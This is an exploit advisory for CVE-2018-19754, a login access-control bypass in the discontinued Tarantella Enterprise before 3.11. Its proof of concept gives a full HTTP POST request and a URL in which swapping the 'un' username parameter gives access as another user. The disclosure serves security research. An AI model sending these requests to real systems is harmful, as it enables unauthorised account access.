Vulnerability found in 2009. <!-- # Exploit Title: Security Bypass Access Control Vulnerability in Tarantella Enterprise before 3.11 # Date: 30-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: Homepage: http://www.sun.com/ & http://www.oracle.com/ # Software Link: the product is discontinued (vulnerability found in 2009) # Version: Tarantella Enterprise before 3.11 # Tested on: All # CVE : CVE-2018-19754 # Category: webapps 1. Description Tarantella Enterprise before 3 3.11 allows a Bypass Access Control, the application does not prevent one user from gaining access to another user's by modifying the parameter value in a login request. 2. Proof of Concept Send POST petition like: POST /tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html HTTP/1.1 Accept: */* Referer: https://XXXX.XXXX:444/html/form_ttaXXXX.html Accept-Language: es Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 2.0.50727) Host: ttarima.cnso Content-Length: 61 Connection: Keep-Alive Cache-Control: no-cache action=bootstrap&pg=index.html&px=DIRECT&un=<usename>&ms=unique Where the parameter un is the username you know. You recive the message: "The content of this file must be language independent! This applet immediately loads a new document in a named frame (here WebtopFrame), which will be something like: ../logintheme/clientcap/index.html. The logintheme is determinated from the appropiate attribute in the datastore. -->" And now, change the username to access to application: https://XXX.XXX/tarantella/cgi-bin/post2get/tarantella/resources/login/sco/tta/boot/strap_XXXX.html?action=bootstrap&pg=index.html&px=DIRECT&un= <valid_username>&ms=unique 3. Solution: The product is discontinued. https://www.oracle.com/us/assets/lifetime-support-hardware-301321.pdf -->